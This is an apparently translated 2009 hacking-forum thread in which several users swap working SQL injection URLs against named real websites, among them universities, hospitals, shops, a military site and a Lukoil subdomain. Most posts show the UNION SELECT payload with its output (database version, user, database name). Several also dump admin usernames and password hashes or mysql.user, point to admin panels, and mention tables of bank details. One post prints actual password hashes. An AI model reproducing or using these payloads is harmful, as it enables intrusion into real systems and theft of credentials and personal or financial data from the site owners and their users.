5.0.81-community:jamescou_jamesco@localhost:jamescou_shoc kcustom

http://www.gpstuner.com/en/news?id=99999+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25--
5.1.35-log:gpstuner@localhost:gpstuner

http://linvo.org/?page=news&id=99999+union+select+1,concat_ws%280x3a,version%2 8%29,user%28%29,database%28%29%29,3,4,5--
5.0.32-Debian_7etch11-log:linvo@localhost:linvo

Bb0y
31.10.2009, 23:09
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,oa_login,0x3a ,oa_pswd_md5,0x3a,email,0x3a,def_discount),4+from+ oa_users
MySQL 5.0.81-log
there are also interesting tables
bank_rekvizit
carts
I think it is clear what can be found in them)
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,id_br,0x3a,bk _name,0x3a,rekvizit,0x3a,schet,0x3a,name,0x3a,nal) ,4+from+bank_rekvizit
============================
http://www.wismamerdeka.com/shop_info.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(0x0b,username,0x3a,password),14,15,16,17,18,1 9,20,21,22+from+_user

MySQL5.0.51b-community-nt
http://www.wismamerdeka.com/admin.php
P.S. Getting lucky with SQLi today for some reason, wish everything went like this)

[x60]unu
01.11.2009, 01:01
medpipe.ru - - -
http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,version(),5,6
version - 5.0.51a-24+lenny2-log
user - medpipe_ru@localhost
database - medpipe_ru
os - debian-linux-gnu
table - user - (user_login, user_password)

http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,concat(user_login,0x3a3a3a,user_password),5, 6/**/from/**/sys_users/**/limit/**/1,1

Bb0y
01.11.2009, 01:18
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,2,3,group_concat(0x0b,column_name ),5,6,7+from+information_schema.columns+where+tabl e_name=0x666b5f61646d696e
fk_admin::name,Password
MySQL 5.0.81-community-log
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,group_concat(0x0b,name,0x3a,passw ord),3,4,5,6,7+from+fk_admin

keng
01.11.2009, 09:05
INSTITUTE FOR MEDICAL RESEARCH AND OCCUPATIONAL HEALTH:

http://www.imi.hr/stranica.php?id=11+union+select+1,2,3--

Version: 5.0.51a-24+lenny2
Database: imi@localhost
User: imi

Gorev
01.11.2009, 15:01
http://www.medialine.eu/sezioni.php?m=79&mm=97&mmm=72&id=27+UNION+SELECT+concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56/*

Database Version: 4.1.22-standard-log
Database name: medialine_eu_medialine
User name: DG3178_medialine@81.88.49.18
Os: pc-linux-gnu

^YaHoo^
01.11.2009, 15:41
http://hmm3.fclan.ru/redir.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
5.0.45:us1204h@localhost:db1204a

http://g-tuning.ru/models/model/?mark=10&model=-112+union+select+concat_ws(0x3a,version(),user(),d atabase())
5.0.67:u2039@localhost:gtuningru

keng
01.11.2009, 17:21
Construction company "НЭП":

http://www.sk-nep.ru/files.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10--

Version: 5.0.45
Database: sk-nep_main
User: db_sk-nep@localhost

Bb0y
01.11.2009, 20:52
http://www.excelsoft.co.id/read_news.php?id=-44+union+select+1,2,group_concat(0x0b,name,0x3a,pa ssw),4,5+from+admin
MySQL 5.0.51a-log
=============================
http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +information_schema.columns+where+table_name=0x706 87062625f7573657273

http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,user_id,0x3a,u sername,0x3a,user_password),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+phpbb_users
MySQL 5.0.77-log
we log in to the forum

Gorev
01.11.2009, 21:12
http://www.ior.ro/produse/index.php?kCtg=6&ID=-50+UNION+SELECT+1,2,3,4,convert(concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os)+usi ng+latin1),6,7,8,9,10--



Database Version: 4.1.11-Debian_4sarge7-log
Database name: dbior
User name: ior@localhost
Os: pc-linux-gnu

[x60]unu
01.11.2009, 21:36
http://www.cilvekaekologija.lv/index.html?id=1/**/and/**/1=2/**/union/**/all/**/select/**/1,2,unhex(hex(version())),4,5,6,7,8,9/*
version - 4.1.14
user - avestl@localhost
database - cilveko

Bb0y
01.11.2009, 21:38
www.euroasiasemiconductor.com/magazine.php?id=45+union+select+1,group_concat(0x0 b,user_id,0x3a,name,0x3a,password,0x3a,email),3,4, 5,6,7+from+cieh_users&date=2007-02-03
MySQL 5.0.45

Gorev
01.11.2009, 21:38
http://www.farmavet.ro/prez_produs.php?id=-76+UNION+SELECT+1,2,3,cast(concat_ws(0x3a,version( ),database(),user(),@@version_compile_os)+as+binar y),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61--

Database Version: 4.1.11-nt
Database name: farmavet
User name: ifarmavet@localhost
Os: win32

pelligrim
01.11.2009, 23:02
http://vetka.server.by/?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--

4.1.22:vetka@localhost:vetka

http://www.radiozavod.com/?prod=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--

5.0.81-community:radio_radio@localhost:radio_radio

http://klinok-blade.ru/rubrikator/index.php?id=999999+union+select+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6--

5.0.67-log:u82142@10.10.223.245:u82142

http://www.kon-tiki.com.ua/index.php?w=country&lang=ru&id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--

5.0.45-log:kontiki@db.skif.com.ua:kontiki

http://rock.aplus.by/providers/?id=-9+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3--
5.0.32-Debian_7etch11:rockaplusby@localhost:rockaplusby

http://www.almaz-pk.ru/articles?id=99999+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--

5.0.82-log:almazpk@cub.mplik.ru:almazpk_tmp

http://www.elitstroymaterials.ru/inside.html?action=news&id=-5+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

5.0.77:elitstro_elit@localhost:elitstro_elit

Bb0y
01.11.2009, 23:29
2pelligrim, I posted the SQLi on santafe-club.Ru on the previous page
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7,8+from+information_schema.columns+where+ta ble_name=0x61646d696e75736572
MySQL 5.0.81-community
http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,adminuser,0x3 a,password,0x3a,level),4,5,6,7,8+from+adminuser
admin panel http://www.solitaire-labs.com/admin
==============================
http://serbianbaseball.org/view_news.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x 3a,pass),3,4+from+admin
MySQL 5.0.81-community
==============================
Foreign web hosting
www.risingnet.net/news_info.php?id=-4+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+28,1
MySQL 5.0.45
http://www.risingnet.net/news_info.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x757365725f 6163636f756e74+limit+32,1
interesting tables
user_account, user_webinfo
I think one could kill some time and take it to its logical conclusion; I didn't have the motivation

keng
02.11.2009, 06:15
Shop «Деревянный Рай»:
http://www.pskovles.ru/tovar.php?id=-1+union+select+1,2,3/*

Version: 4.1.22-log
Database: konkurent_svoi
User: konkurent_svoi@localhost

s0l_ir0n
02.11.2009, 15:12
Microcredit organization "Алтын Орда"
http://altynorda.kz/news.php?id=0%20union%20select%201,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,3,4%2 0--

Bb0y
02.11.2009, 20:03
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x64656661756c745f55 7365724442--
interesting tables:
default_UserDB::ID:user_name:email_Address:user_pa ssword:isAdmin
default_UserDBElements
default_memberFormElements
default_userFavoriteListings
default_userFormElements
default_userImages
default_userSavedSearches
I'll go after default_UserDB
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,use r_password),3+from+default_UserDB--
the admin's hash is easily found in public databases
admin panel: http://greenstreetprop.com/admin

MySQL 5.0.82sp 1
conveniently, it outputs all rows at once, no need to play with limits and group_concat.
blind

cupper
02.11.2009, 20:25
http://www.izak.ru/article/index.php?id_article=-286+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14

u15468@10.10.153.207:u15468:5.0.67-log

if this one is a repost too, then explain to me how you determine the degree of repost-ness?
I specifically checked all the keywords in the search; it isn't there.

Aртем
02.11.2009, 20:48
http://www.antonpaleev.ru/show.php?id=52+and+1=2+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13+--+
http://www.ppp-pf.ru/show.php?id=154+and+1=0+union+select+1,2,3,4,5,6,7 ,8--
http://www.egyptt.ru/show.php?id=4+and+1=0+union+select+1,2--
http://www.datatec.ru/show.php?id=271+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14--
http://www.expertitalia.ru/show.php?id=1252182905+and+1=0+union+select+1,2,3, 4,5,6,7,8,9,10,11,12--

Gorev
02.11.2009, 21:04
http://www.pc-coolers.ro/produs.php?id=-103+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21/*



Database Version: 4.1.22-log
Database name: pcc
User name: pcc@localhost
Os: redhat-linux-gnu

547
02.11.2009, 23:08
http://job.aviso.ua/news.php?id=-1482+union+select+1,2,version(),4,5,6,7--

Aртем
02.11.2009, 23:09
http://orgo-x-libris.ru/show.php?id=13+and+1=0+union+select+1,2,3,4,5,6,7, 8,9,10--
http://www.jupiter-group.ru/product/?menu=Case&flag=2&id=46+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30--
http://www.ansmann.ru/catalog/second_1_1.php?id=-62+union+select+1,2,3,4,5,6,7,8+--+
http://wi-fi.auditory.ru/NNews.php?action=View&ID=30+and+1=0+union+select+1,2,3,4,5--

^YaHoo^
02.11.2009, 23:23
http://www.volgotrans.mv.ru/front/catalog.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
5.0.51a-24-log:kater@localhost:volgotrans

http://www.alona-bondarenko.com/index.php?area=1&p=gallery&action=showimages&galid=-30+union+select+1,concat_ws(0x3a,version(),user(), database()),3
5.0.67-percona-highperf-b7-log:woyager@localhost:woyager

http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12--
http://www.unitedbakers.ru/index.php?section_id=-1+union+select+1,2,concat_ws(0x3a,email,u_login,u_ passwd),4,5,6,7,8,9,10,11,12+from+users+limit+100, 10000--
5.0.67:unitedbakersru@78.108.81.221:unitedbakersru _ub : portbld-freebsd7.0

http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database(),@@version_compile_os),6,7,8,9,10,1 1,12--
http://www.newage.ru/?mod=s_page&sp_id=-2+union+select+1,2,3,4,concat_ws(0x3a,password,use r),6,7,8,9,10,11,12+from+mysql.user--
5.0.67-log:root@localhost:test:redhat-linux-gnu

Gorev
03.11.2009, 00:02
http://www.technique.ro/produs.php?produs=6+UNION+SELECT+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8,9,10,11,12,13

Database Version: 5.0.81-community
Database name: rtec0602_technique
User name:rtec0602_rtech@localhost
Os: pc-linux-gnu

[x60]unu
03.11.2009, 01:20
permneft.lukoil-perm.ru PR=4 TC=40 - a Lukoil subdomain

http://permneft.lukoil-perm.ru/index.html?id=1/**/and/**/substring(version(),1,1)=5

Branch - 5

onbka
03.11.2009, 03:10
http://www.ren-tv.tv/newss.php?news_id=-1300 union select 1,2,3,4,concat_ws(0x3a,user(),version(),data base()),6 --

rentv2@localhost
4.1.25-log
rentv2

TELO
03.11.2009, 05:11
tIC: 10
PR: 5
http://ebar.com/news/article.php?sec=news&article=-4254%20union%20select%201,2,3,4,5,6,7,concat_ws%28 0x3a,user%28%29,version%28%29,database%28%29%29,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27%20--
Version = 5.0.81-community
User = ebar_ebar@localhost
Database:ebar_ebclass
Database:ebar_ebar

http://www.peabody.uga.edu/news/event.php?id=59+and+1=0+%20Union%20Select%201,2,UN HEX%28HEX%28version%28%29%29%29,4,5,6,7,8,9
Version = 5.0.82-log
User = Peanuts@localhost
Database:mysql:Dev_Peabody_com_live:PeasandCarrots :test

http://www.reden.dk/index.php?section_id=-52%20union%20select%20database%28%29%20--
Version = 4.1.22-standard
User = reden@linux4.wannafind.dk
Database = reden_dk_db4

http://www.antonygormley.com/wip.php?sectionid=1+and+1=0+%20Union%20Select%201, database%28%29,3,4,5/*
Version = 4.0.24_Debian-10sarge2-log
User = antonygo@z1lnx004.web.vi.net
Database = antonygo

F4R
03.11.2009, 06:33
http://www.tni.mil.id/gallerydtl.php?id=147&cid=-27+UNION+SELECT+1,2,3,concat_ws%28version%28%29,us er%28%29,database%28%29%29,5,6,7--

MySQL version: 5.0.77
user: ayam@localhost
database name: elang

dumped from the user table:
[0]:admin:a55891977489d2f3c39855dfc9d0e211 [1]:puspen TNI:12412e18e39e9ebc5c67cff8a625ed73 [2]:bangsawancyberindo:3ceda926b2438e8f900d64b74e9ed2 36

keng
03.11.2009, 06:49
Katholieke Universiteit Leuven:
http://soc.kuleuven.be/sw/nieuws/itemid.php?id=-7+union+select+1,2,3,4,unhex%28hex%28concat_ws%280 x20,version%28%29,database%28%29,user%28%29%29%29% 29,6,7,8,9,10,11,12/*
Version: 4.1.13-standard-log
Database: fsw
User: fsw@tobias.cc.kuleuven.ac.be

TELO
03.11.2009, 06:52
PR: 6
http://www.academicintl.com/main_pages.php?section_id=5&content_id=121+and+1=0+%20Union%20Select%20%20%20U NHEX%28HEX%28version%28%29%29%29
Version = 5.0.70-log
User = apihost_webDB@localhost
Database = apihost_API :: apihost_dev
Tables:CP_users :: AO_users
Columns: Table CP_users
LAST_LOGIN
FIRST_NAME
LAST_NAME
EMAIL
PASSWORD
DOKUGROUP

pelligrim
03.11.2009, 08:11
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7--

4.1.25-log:atur@localhost:atur


http://advayta.org/item/000013/?id=3+and+substring(version(),1,1)=5
5.1.35

Gorev
03.11.2009, 10:18
http://www.virsteana.ro/en/produs.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--


Database Version: 4.1.21-standard-log
Database name: virst_virsteana
User name: virst_virst@localhost
Os: pc-linux-gnu

keng
03.11.2009, 10:47
INFOCYT (PR: 6):
http://www.infocyt.cl/info.php?id=-1+union+select+1,2,3,4,5,6/*
Version: 4.1.20
Database: infocyt
User: adm_infocyt@localhost

Gorev
03.11.2009, 10:51
http://www.tecoprestcom.ro/produs.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7

Database Version: 4.1.22-log
Database name: whtecoprestcomroa
User name:tecoprestcomroa@localhost
Os: redhat-linux-gnu

keng
03.11.2009, 11:05
Pension Primus:
http://www.czechpensionen.cz/info.php?id=-1+union+select+1,2/*
Version: 4.0.18-Max-log
Database: czechpensionendb
User: pension@localhost

-----------------------------------

Axiom College (PR=4):
http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16--

Version: 5.0.67-community-nt
Database: axiom
User: root@localhost

There is access to mysql.user:
http://www.axiomcollege.com.au/training-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x20,us er,password,file_priv),11,12,13,14,15,16+from+mysq l.user--

Gorev
03.11.2009, 12:40
http://www.scauneitalia.ro/produs.php?id=-47+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11

Database Version: 5.0.51a-community
Database name: scauneit_wisemedscauneitalia
User name:scauneit_wisemed@localhost
Os: redhat-linux-gnu

[underwater]
03.11.2009, 13:56
http://www.pure-red.com/en/hongkong/news/index.php?news_id=-1%20union%20select%201,2,group_concat(username,0x3 a,password),4%20from%20admins--

http://www.musiquemachine.com/reviews/reviews_template.php?id=1+AND+1=2+UNION+SELECT+1,2 ,3,4,5,6,7,8,%20version(),10,11,12,13,14,15,16,17--

Bb0y
03.11.2009, 14:14
Dedicated to owners of the chervonets
http://vaz2110.net/view_text.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name ),5,6,7+from+information_schema.columns+where+tabl e_name=0x757365726c697374
MySQL 5.0.51a-24+lenny1
http://vaz2110.net/view_text.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x 3a,pass),3,4,5,6,7+from+userlist
sort of an admin panel http://vaz2110.net/admin/ followed the path in the error
http://vaz2110.net/admin/include/

keng
03.11.2009, 14:27
http://www.xxbt.com/cartoon.php?id=-1+union+select+1,2,3,4/*
Version: 5.0.22-log
Database: xxbt
User: xxbt_f@localhost

DeluxeS
03.11.2009, 14:34
http://review-novoros.ru/article.php?id=-1554+union+select+1,2,3,table_name,5,6,7+from+info rmation_schema.tables+limit+20,1--

---

TELO
03.11.2009, 14:45
http://www.freefloat.net/content.php?section_id=1&subsection_id=5&ID=42+and+1=0+Union%20Select%201,2,version%28%29,4 ,5,6%20--
Version = 4.0.18-standard-log
User = root@localhost
Database = freefloat

keng
03.11.2009, 14:52
http://calodox.scene.org/demoo/select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Version: 5.0.77-1
Database: calodox
User: calodox@hosted.scene.org

---------------------------------------------

http://www.mnhospitaljobs.com/hospitalprofile-select.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
Version: 5.0.81-community
Database: dsmmn_mnhospit
User: dsmmn_llcoolb@localhost

Gorev
03.11.2009, 14:58
http://www.axcent.ro/detalii_produs.php?lang=romana&ID=225&m_catid=161&pID=-450+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--


Database Version: 4.1.20-log
Database name: netaxcentro
User name: axcentro@193.226.140.172
Os: redhat-linux-gnu


http://www.denisamarket.ro/produs.php?lang=romana&ID=-58+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7--%20&m_catid=13


Database Version: 4.1.20-log
Database name: netdenisamarketro
User name: denisamarketro1@193.226.140.172
Os: redhat-linux-gnu

TELO
03.11.2009, 15:07
http://jaydonaldson.com/section.php?section_id=1+and+1=0+Union%20Select%20 UNHEX%28HEX%28version%28%29%29%29
Version = 5.0.77-community
User = donaldso_jaydona@localhost
Database = donaldso_jaydonaldson

PR: 6
http://www.manilawater.com/section.php?section_id=6&category_id=34+and+1=0+%20Union%20Select%201,2,3,v ersion%28%29,5,6,7,8%20,9%20,10
Version = 5.0.32-Debian_7etch11-log
Database = spark-mwc
User = spark-mwc@localhost
Tables:users
Columns: Table users
user_login
user_password
user_name
user_email
user_type
user_status

PR: 4
http://www.autocam.com/main.php?section_id=6+and+1=0+%20Union%20Select%20 %20%20UNHEX%28HEX%28version%28%29%29%29%20,2,3,4,5 ,6,7,8,9
Version = 4.1.16-standard
User = autocam@192.168.5.6
Database = autocam

http://www.leefirerescue.com/view.php?section_id=18+and+1=0+Union Select 1,UNHEX(HEX(version())),3 --
Version = 5.0.77-community
User = leefddb@localhost
Database = leefd
Lensys
Rogue
SpamAssassin
Timesheets
Vtodd
agency
bfd1sql
dcaffiliate
easyadmin
ebdesign
er_ares_members
fnclist
gbwphpcollab
graphicdetails
hamptonattack
jackbingham
k1foo
lenharth
lensync_joomla
lightware
mysql
mysqlorig
nmhfdb
nuke
pcarc
portal
rowley
scffwa
seacoastbb
secret
space
telacovers
test
trimark_dada
trimark_mambo
vpopmail
vtodddb
w1roc_bb
w1wqm

http://www.courierjournal.net/sectionfront.php?section_id=7+and+1=0+Union%20Sele ct%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34%20--
Version = 4.0.27
User = cjadmin@localhost
Database = cjnet

keng
03.11.2009, 15:52
Housing Development Corporation:
http://www.hdc.com.mv/Projects/project-select.php?id=-1)/**/union/**/select/**/unhex(hex(user())),unhex(hex(user())),unhex(hex(us er())),unhex(hex(user())),unhex(hex(user())),unhex (hex(user())),unhex(hex(user())),unhex(hex(user()) ),unhex(hex(user())),unhex(hex(user())),unhex(hex( user())),unhex(hex(user())),unhex(hex(user())),unh ex(hex(user())),unhex(hex(user())),unhex(hex(user( ))),unhex(hex(user())),unhex(hex(user())),unhex(he x(user()))/*
Version: 4.1.7
Database: hdc
User: hdc@10.16.4.5

Phew, I got worn out with this one... :)

keng
03.11.2009, 17:27
Democratic Pacific Union:
http://www.dpu.org.tw/En/Service.php?ID=37&ArticleID=-1+union+select+1,2,unhex(hex(version()))--
Version: 5.0.18
Database: dpu_database
User: root@localhost

The output is in the link on the "Download Now" image.

-------------------------------------------------------------
Institution Régionale des Sourds et des Aveugles:
http://www.irsa.fr/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38--
Version: 5.0.81-0.dotdeb.0-log
Database: H206901
User: H2069@localhost

------------------------------------------------------------
MasterLube:
http://www.masterlube.com/services/service.php?id=-1+union+select+1,2,3,4,5,6,7--
Version: 4.1.12-log
Database: mayzie
User: mailbox@localhost

^YaHoo^
03.11.2009, 17:38
http://ski.stel.ru/rus/forage.shtml?id=-236+union+select+1,2,concat_ws(0x3a,version(),user (),database(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
4.1.25:arasia@localhost:skivagi: portbld-freebsd6.1

http://www.elmh.ru/elmcatalog/?subclass=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase(),@@version_compile_os)--
4.0.27-log:elektromash@zvm8.host.ru:elektromash:i86pc-solaris2.8

http://www.loretta.ru/?view=-868+union+select+1,concat_ws(0x3a,version(),user() ,database(),@@version_compile_os)--
4.1.22-standard:loretta@own3.web-soft.ru:loretta: pc-linux-gnu

http://www.stplus.ru/content.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),user( ),database(),@@version_compile_os),4--
5.0.32-Debian_7etch11-log:stplusru_db@localhost:stplusru_db: pc-linux-gnu

http://rybalka.zooclub.ru/indexr.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),user(),database(),@@version_compile_os)--

5.0.81-community-log:zooclub_zooclub@localhost:zooclub_rybalka: pc-linux-gnu

http://www.ma3da.ru/downloads.php?dg_id=1/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database(),@@ver sion_compile_os),3
5.0.56-lk-log:ma3daru@localhost:ma3daru: pc-linux-gnu

http://www.jobru.ru/?act=data&from=podrubriki&type=resume&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase(),@@version_compile_os),3,4--
5.0.27:ariadna@localhost:jobru:redhat-linux-gnu

http://www.audi-vitebskiy.ru/index.php?ob=car_comp&idclass=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database(),@@v ersion_compile_os),4,5,6/*
4.1.25-log:00131350@localhost:db00131350:unknown-freebsd4.10

keng
03.11.2009, 17:47
Manches LP:
http://www.manches.com/practices/family/service.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
Version: 5.0.45
Database: manches
User: manches@localhost

hackmon
03.11.2009, 18:11
http://www.skags.ru/dissov.php?uid=-1+union+select+1,2,3

4.0.23
SKAGS_DB
tabl poll_user


http://www.skags.ru/dissov.php?uid=-1+union+select+1,concat_ws%280x3b,username,userpas s%29,3+from+poll_user--

:p

547
03.11.2009, 18:27
Strategic Energy Research
4.1.22-max-log:energy:energy@metro.gatech.edu:sun-solaris2.9

http://www.energy.gatech.edu/research/research.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4--
admin panel
http://www.energy.gatech.edu/admin/

Gorev
03.11.2009, 18:46
http://www.promen.ro/produs.php?id=i-1&subcat=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--


Database Version: 4.1.22-standard-log
Database name: promen_promencontent
User name: promen_root@localhost
Os: pc-linux-gnu

Dyxxx
03.11.2009, 23:44
Formel3.de pr4
ATS Formel 3 Cup
http://www.formel3.de/news.php
?id=null+union+select+null,concat_ws(char(32,124,3 2),version(),user(),database(),@@version_compile_o s),null,null,null,null,null,null
4.1.22-standard-log | db161837_7@local2 | db161837_7 | pc-linux-gnu

Bb0y
03.11.2009, 23:45
While riding the bus I decided to occupy myself with something, specifically, to relive the old days and look for SQLi in Postgres
http://www.vgihs.edu.in/popnews.php?nid=-4+union+select+usename||chr(58)||passwd+from+pg_us er+limit+1+offset+2--

http://www.vgihs.edu.in/popnews.php?nid=-4;select+cast(version()+as+int)--
PostgreSQL 8.0.8 on i386-redhat-linux-gnu, compiled by GCC i386-redhat-linux-gcc (GCC) 4.0.2 20051125 (Red Hat 4.0.2-8)

btw, edu)

ILYAtirtir
04.11.2009, 00:41
«КАРУСЕЛЬ» HYPERMARKETS

http://karusel.ru/personnel.php?city=-12+union+select+1,concat_ws(0x3a,database(),user() ,version())&all=12
karusel_www:karusel@localhost:5.0.45-log

nemaniak
04.11.2009, 01:59
sweeto.co.uk PR-1

http://euwb.sweeto.co.uk/thread.php?threadid=-350+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8+--+&page=3

5.0.82-community:web81-sweeto@localhost:web81-sweeto

stratfordboilerstoves.co.uk PR-3

http://www.stratfordboilerstoves.co.uk/online_spares.php?model=%27+union+select+concat_ws (0x3a,version(),user(),database()),2,3,4,5,6,7,8,9 +--+

5.0.82-community:web100-aarrow@web43.extendcp.co.uk:web100-aarrow

shakies.co.uk PR-2

http://www.shakies.co.uk/vote/results.php?pollid=1%27+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5+--+

5.0.82-community:web80-vote@localhost:web80-vote

DezMond™
04.11.2009, 12:31
http://www.katemagic.ru/index2.php?kind=-0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

http://www.assotecnicaofferte.it/pop.php?ID=-877+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+/*+

http://www.usefulandagreeable.com/magazine.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102,103,104,105+/*+


http://www.nourhaikphoto.com/photos.php?groupe=144&album=-518+union+select+1,2,3,4,5,pass+from+user+/*+

http://livenloudmagazine.com/photos.php?groupe=95&album=-122+union+select+1,2,3,4,5,pass+from+user+/*+

Bb0y
04.11.2009, 13:26
This time it's MySQL
http://vmcenter.ru/newsdetail.php?id=-4+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name=0x757 3657273
MySQL 5.0.27
http://vmcenter.ru/newsdetail.php?id=-4+union+select+concat(0x0b,login,0x3a,password)+fr om+users
apparently this table is empty

^YaHoo^
04.11.2009, 16:34
MGIMO institute
http://www.miu.mgimo.ru/siteindex.php?page=38&mode=group&edtype=1&gradyear=9&specialty=&id=-16+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31--
4.1.21-community-nt:mgimo_miu:mgimo_miu@localhost:Win32

http://education.centrinvest.ru/person.php?id=-1544704+union+select+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),14,15,16,17--
5.0.70-log:edu:edu@localhost: pc-linux-gnu

Gorev
04.11.2009, 23:10
view-source:

